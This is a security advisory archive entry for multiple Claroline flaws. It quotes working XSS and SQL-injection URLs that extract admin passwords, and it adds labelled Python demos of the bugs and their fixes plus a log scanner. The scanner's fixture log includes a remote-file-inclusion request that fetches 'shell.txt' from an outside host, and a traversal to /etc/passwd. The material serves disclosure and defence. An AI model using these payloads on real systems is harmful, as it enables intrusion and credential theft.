SecurityTracker Archives
Category:   Application (Generic)  >   Claroline
Vendors:   Claroline.net
Claroline Lets Remote Users Execute Arbitrary Commands, View Files, Inject SQL Commands, and Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013822
SecurityTracker URL:  http://securitytracker.com/id/1013822
CVE Reference:   CVE-2005-1374, CVE-2005-1375, CVE-2005-1376, CVE-2005-1377   (Links to External Site)
Updated:  May 3 2005
Original Entry Date:  Apr 28 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of system information, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): prior to 1.5.4; also 1.6 beta and 1.6 RC1
Description:   Kevin Fernandez "Siegfried" from Zone-H reported several vulnerabilities in Claroline. A remote user can view files on the target system, execute arbitrary commands on the target system, inject SQL commands, and conduct cross-site scripting attacks.

The software does not properly validate user-supplied input in several scripts and parameters.

A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Claroline software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. The following pages are affected:

claroline/exercice/exercise_result.php
claroline/exercice/exercice_submit.php
claroline/calendar/myagenda.php
claroline/calendar/agenda.php
claroline/tracking/user_access_details.php
claroline/tracking/toolaccess_details.php
claroline/learnPath/learningPathList.php
claroline/learnPath/learningPathAdmin.php
claroline/learnPath/learningPath.php
claroline/tracking/userLog.php

Additional pages are affected.

Some demonstration exploit URLs are provided:

claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/tracking/user_access_details.php?cmd=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
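
The mechanics behind these three URLs, as an added example that is not part of the SecurityTracker entry or of Claroline's code: Python stands in for the PHP pages, decoding the query strings the way `$_GET` would and rendering the value into two hypothetical contexts (element text, and an unquoted attribute, which is the situation the `%3E` prefix of the `coursePath` payload is built for). The vulnerable and hardened renderers and the page markup are assumptions for illustration; the URLs are the advisory's own.

```python
from html import escape
from urllib.parse import unquote_plus

# The three demonstration URLs quoted in the advisory, with the "=3D" quoted-printable
# artifacts of the mailing-list copy restored to "=".
ADVISORY_URLS = [
    "claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E",
    "claroline/tracking/user_access_details.php?cmd=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E",
    "claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
]


def get_params(url):
    """Decode the query string the way PHP fills $_GET: split on '&' only, percent-decode once."""
    params = {}
    for pair in url.partition("?")[2].split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def render_text_unsafe(value):
    """Hypothetical vulnerable page: echoes the parameter straight into element text."""
    return f"<h2>Access details for tool {value}</h2>"


def render_attr_unsafe(value):
    """Hypothetical vulnerable page: echoes the parameter into an unquoted attribute.
    In that context a leading '>' closes the tag, which is what the advisory's
    coursePath payload (%3E%3Cscript...) does before injecting its script."""
    return f"<a href=myagenda.php?coursePath={value}>back</a>"


def render_text_safe(value):
    """Fix for text context: HTML-encode < > & \" ' (PHP: htmlspecialchars($v, ENT_QUOTES))."""
    return f"<h2>Access details for tool {escape(value, quote=True)}</h2>"


def render_attr_safe(value):
    """Fix for attribute context: quote the attribute AND encode. Encoding alone does not
    make an unquoted attribute safe, because a space would still end the value."""
    return f'<a href="myagenda.php?coursePath={escape(value, quote=True)}">back</a>'


def script_injected(html):
    """True if a live <script> start tag made it into the rendered output."""
    return "<script>" in html.lower()


if __name__ == "__main__":
    for url in ADVISORY_URLS:
        for name, value in get_params(url).items():
            print(f"{url.split('?')[0]} {name}={value!r}")
            print("  unsafe text :", script_injected(render_text_unsafe(value)))
            print("  safe text   :", script_injected(render_text_safe(value)))
```

The decoder deliberately splits on `&` only; PHP does the same, and a decoder that also splits on `;` (as older `urllib.parse.parse_qs` did) would truncate the `alert('xss');` payloads and hide the problem.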

A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database via the following scripts (a number in parentheses is the count of injection points the advisory reports in that script; ten in total). The advisory states that the injections can be used to retrieve the passwords of the administrator and of arbitrary teachers or students:

claroline/learnPath/learningPath.php (3)
claroline/tracking/exercises_details.php
claroline/learnPath/learningPathAdmin.php
claroline/tracking/learnPath_details.php
claroline/user/userInfo.php (2)
claroline/learnPath/modules_pool.php
claroline/learnPath/module.php

Demonstration exploit URLs are provided (note that each UNION pads with a different number of zeros, because the injected SELECT must return exactly as many columns as the query it is appended to):

claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/*
claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1--
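
How the uInfo payload above extracts a credential, as an added example that is not Claroline's code or the advisory's: the query shape, the `course_user` table and every column name other than `user`/`username`/`password` are assumptions, the rows are constructed, and SQLite replaces MySQL (it accepts the same trailing `/*` comment, which swallows the rest of the original WHERE clause). The block shows the string-built query leaking the administrator's hash, the bound-parameter version returning nothing, and why a payload with the wrong column count fails instead of leaking.

```python
import sqlite3

# The uInfo payload from the advisory's first demonstration URL, URL-decoded.
UINFO_PAYLOAD = "-1 UNION SELECT username,password,0,0,0,0,0 from user where user_id=1/*"

# Hypothetical stand-in for the relevant Claroline tables. The hashes are the MD5 of
# "password" and "test", constructed for the demo.
SCHEMA = """
CREATE TABLE user (user_id INTEGER PRIMARY KEY, username TEXT, password TEXT);
CREATE TABLE course_user (
    user_id INTEGER, course_code TEXT, lastname TEXT, firstname TEXT, email TEXT,
    official_code TEXT, status INTEGER, role TEXT, tutor INTEGER);
INSERT INTO user VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO user VALUES (2, 'jdoe', '098f6bcd4621d373cade4e832627b4f6');
INSERT INTO course_user VALUES
    (2, 'SEC101', 'Doe', 'Jane', 'jdoe@example.invalid', 'S-0002', 5, 'student', 0);
"""

COLUMNS = "lastname, firstname, email, official_code, status, role, tutor"


def open_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def user_info_vulnerable(con, uinfo, course_code):
    """The pattern the advisory describes: the raw parameter is pasted into the SQL text.
    With the payload, user_id = -1 matches nothing, the UNION appends the admin's
    username/password in the first two columns, and the trailing '/*' comments out
    the rest of the original WHERE clause."""
    sql = (f"SELECT {COLUMNS} FROM course_user "
           f"WHERE user_id = {uinfo} AND course_code = '{course_code}'")
    return con.execute(sql).fetchall()


def user_info_fixed(con, uinfo, course_code):
    """Hardened form: check the type, then bind the values. Nothing the user sends is
    ever parsed as SQL."""
    try:
        uid = int(uinfo)
    except ValueError:
        return []  # a user id must be an integer; reject anything else
    sql = f"SELECT {COLUMNS} FROM course_user WHERE user_id = ? AND course_code = ?"
    return con.execute(sql, (uid, course_code)).fetchall()


def union_column_mismatch(con, uinfo):
    """Why the advisory's two payloads pad with a different number of zeros: a UNION must
    produce exactly as many columns as the SELECT it is appended to. Against this
    six-column query the seven-column uInfo payload is a syntax error, not a leak."""
    sql = ("SELECT lastname, firstname, email, official_code, status, role "
           f"FROM course_user WHERE user_id = {uinfo} AND course_code = 'SEC101'")
    try:
        con.execute(sql).fetchall()
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = open_db()
    print("vulnerable:", user_info_vulnerable(db, UINFO_PAYLOAD, "SEC101"))
    print("fixed     :", user_info_fixed(db, UINFO_PAYLOAD, "SEC101"))
    print("mismatch  :", union_column_mismatch(db, UINFO_PAYLOAD))
```

The important property of the fixed version is not the `int()` check on its own but the bound parameters: a script that takes a free-text value instead of an id has no type to check, and only binding keeps the value out of the parser.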

The 'claroline/document/document.php' and 'claroline/learnPath/insertMyDoc.php' scripts do not properly validate file paths. A remote authenticated course administrator (teacher) can use directory traversal sequences to upload files to arbitrary folders and to view, copy, move, and delete files in arbitrary directories.
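
The check a document tool needs against this class of bug, as an added example (not Claroline's code): resolve the user-supplied path beneath the course document root and refuse anything that ends up outside it, after following symlinks. The sandbox layout is constructed for the demo and is not Claroline's directory structure.

```python
import os
import tempfile


def safe_join(root, user_path):
    """Resolve user_path beneath root and refuse anything that ends up outside it.
    realpath() follows symlinks, so a link planted inside root that points outside is
    rejected too. Expects the already URL-decoded value (what PHP's $_GET delivers);
    do not decode again here, or %252e%252e-style double encoding slips through."""
    if os.path.isabs(user_path):
        raise PermissionError(f"absolute path rejected: {user_path!r}")
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, user_path))
    # commonpath, not startswith: "/srv/docs2/x" starts with "/srv/docs" but is outside it.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PermissionError(f"{user_path!r} escapes {root}")
    return candidate


def escapes(root, user_path):
    """True if safe_join would reject the path."""
    try:
        safe_join(root, user_path)
    except PermissionError:
        return True
    return False


def make_sandbox():
    """Constructed course document tree for the demo:
    <root>/course/week1/notes.txt plus a symlink <root>/course/escape -> parent of root,
    the kind of link a user with upload rights could plant."""
    root = tempfile.mkdtemp(prefix="claroline_doc_")
    os.makedirs(os.path.join(root, "course", "week1"))
    with open(os.path.join(root, "course", "week1", "notes.txt"), "w") as fh:
        fh.write("lecture notes\n")
    os.symlink(os.path.dirname(root), os.path.join(root, "course", "escape"))
    return root


if __name__ == "__main__":
    sandbox = make_sandbox()
    for p in ["course/week1/notes.txt", "course/week1/../week1/notes.txt",
              "../../../../etc/passwd", "course/escape/passwd", "/etc/passwd"]:
        print(f"{p!r}: {'REJECTED' if escapes(sandbox, p) else 'ok'}")
```

Note that `course/week1/../week1/notes.txt` is accepted: the check is on where the path resolves, not on the presence of `..`, so legitimate relative references keep working while every escape is caught.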

A remote user can cause the system to include and execute PHP code located on a remote site. The advisory reports four such remote file inclusion flaws but does not name the affected scripts or parameters. The included PHP code, and any operating system commands it issues, will run with the privileges of the target web service.
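
A retrospective detection pass over web server logs for the four issue classes in this entry, as an added example that is not part of the advisory. The log lines are constructed: the first three requests reuse the advisory's own demonstration URLs, while the traversal and inclusion requests use a made-up page name and made-up parameter names (`action`, `file`, `includePath`), since the advisory names neither. The normaliser undoes the two evasions the advisory's payloads already use, percent-encoding and `/**/` comments in place of spaces.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines, not real traffic (see the lead-in for what is made up).
SAMPLE_LOG = """\
203.0.113.7 - - [28/Apr/2005:10:01:02 +0200] "GET /claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Apr/2005:10:01:09 +0200] "GET /claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/* HTTP/1.1" 200 1874 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Apr/2005:10:01:15 +0200] "GET /claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1-- HTTP/1.1" 200 1902 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Apr/2005:10:02:40 +0200] "GET /claroline/document/document.php?action=delete&file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Apr/2005:10:03:01 +0200] "GET /claroline/example.php?includePath=http://203.0.113.9/shell.txt HTTP/1.1" 200 640 "-" "Mozilla/5.0"
198.51.100.4 - - [28/Apr/2005:10:03:30 +0200] "GET /claroline/calendar/agenda.php?cidReq=SEC101 HTTP/1.1" 200 4101 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
SQLI_RE = re.compile(r"\bunion\b\s+(?:all\s+)?select\b")
RFI_RE = re.compile(r"=\s*(?:https?|ftp)://")


def normalise(query):
    """Percent-decode twice (catches %25-style double encoding as well as plain encoding),
    replace MySQL inline comments with a space, and lower-case for matching."""
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"/\*.*?\*/", " ", decoded).lower()


def classify(target):
    """Return the attack classes whose indicators appear in one request target."""
    path, _, query = target.partition("?")
    if not path.startswith("/claroline/") or not query:
        return []
    q = normalise(query)
    hits = []
    if "<script" in q:
        hits.append("xss")
    if SQLI_RE.search(q):
        hits.append("sqli")
    if "../" in q or "..\\" in q:
        hits.append("traversal")
    if RFI_RE.search(q):
        hits.append("rfi")
    return hits


def scan(log_text):
    """Return (client_ip, script, classes) for each suspicious request in the log."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        classes = classify(target)
        if classes:
            findings.append((line.split(" ", 1)[0], target.partition("?")[0], classes))
    return findings


if __name__ == "__main__":
    for ip, script, classes in scan(SAMPLE_LOG):
        print(f"{ip} {script} {','.join(classes)}")
```

The indicators are deliberately loose (any `../`, any `=http://`): for an incident review of a known-vulnerable install that is the right trade-off, and the script name in each finding is what lets you cross-check against the affected-page lists above.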

The vendor was notified on April 22, 2005.

Kevin Fernandez "Siegfried" and Mehdi Oudad "deepfear" from the Zone-H Research Team discovered these vulnerabilities.

Impact:   A remote user can execute PHP code and operating system commands with the privileges of the target web service.

A remote user can execute SQL commands on the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Claroline software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote authenticated course administrator (teacher) can upload files to arbitrary directories and can view, copy, move, and delete files in arbitrary directories.

Solution:   The vendor has issued fixed versions (1.5.4 for the 1.5 branch, and 1.6 final for the 1.6 branch), available at:

http://www.claroline.net/download.htm

Vendor URL:  www.claroline.net/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  ZRCSA-200501 - Multiple vulnerabilities in Claroline


Zone-H Research Center Security Advisory 200501
http://fr.zone-h.org

Date of release: 27/04/2005

Software: Claroline (www.claroline.net)

Affected versions:
1.5.3
1.6 beta
1.6 Release Candidate 1
(probably previous versions too)

Risk: High

Discovered by:
Kevin Fernandez "Siegfried"
Mehdi Oudad "deepfear"
from the Zone-H Research Team

Background (from their web site)
----------
Claroline is open-source software based on PHP/MySQL. It's a collaborative learning environment allowing teachers or education institutions to create and administer courses through the web.

Description
-----------
Multiple Cross site scripting, 10 SQL injection, 7 directory traversal and 4 remote file inclusion vulnerabilities have been found in Claroline.


Details
-------

1) Multiple Cross site scripting vulnerabilities have been found in the following pages:
claroline/exercice/exercise_result.php
claroline/exercice/exercice_submit.php
claroline/calendar/myagenda.php
claroline/calendar/agenda.php
claroline/tracking/user_access_details.php
claroline/tracking/toolaccess_details.php
claroline/learnPath/learningPathList.php
claroline/learnPath/learningPathAdmin.php
claroline/learnPath/learningPath.php
claroline/tracking/userLog.php
[..]

Examples:
claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/tracking/user_access_details.php?cmd=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
[..]

2) 10 SQL injections have been found; they could be exploited by users to retrieve the passwords of the admin, arbitrary teachers or students.
claroline/learnPath/learningPath.php (3)
claroline/tracking/exercises_details.php
claroline/learnPath/learningPathAdmin.php
claroline/tracking/learnPath_details.php
claroline/user/userInfo.php (2)
claroline/learnPath/modules_pool.php
claroline/learnPath/module.php

Examples:
claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/*
claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1--
[..]

3) Multiple directory traversal vulnerabilities in "claroline/document/document.php" and "claroline/learnPath/insertMyDoc.php" could allow project administrators (teachers) to upload files in arbitrary folders or copy/move/delete (then view) files of arbitrary folders by performing directory traversal attacks.

4) Four remote file inclusion vulnerabilities have been discovered.

Solution
--------
The Claroline users are urged to update to version 1.54 or 1.6 final:
http://www.claroline.net/download.htm

See also:
http://www.claroline.net/news.php#85
http://www.claroline.net/news.php#86

Timeline
--------
18/04 Vulnerabilities found
22/04 Vendor contacted (quick answer)
25/04 Claroline 1.54 released
26/04 Claroline 1.6 final released
27/04 Users alerted via the mailing list
27/04 Advisory released

French version available here: http://fr.zone-h.org/fr/advisories/read/id=180/
English version: http://www.zone-h.org/advisories/read/id=7472

Zone-H Research Center
http://fr.zone-h.org

Join us on #zone-h @ irc.eu.freenode.net

You can contact the team leader at deepfear@fr.zone-h.org

Thanks to University Montpellier 2.
 
 


Copyright 2019, SecurityGlobal.net LLC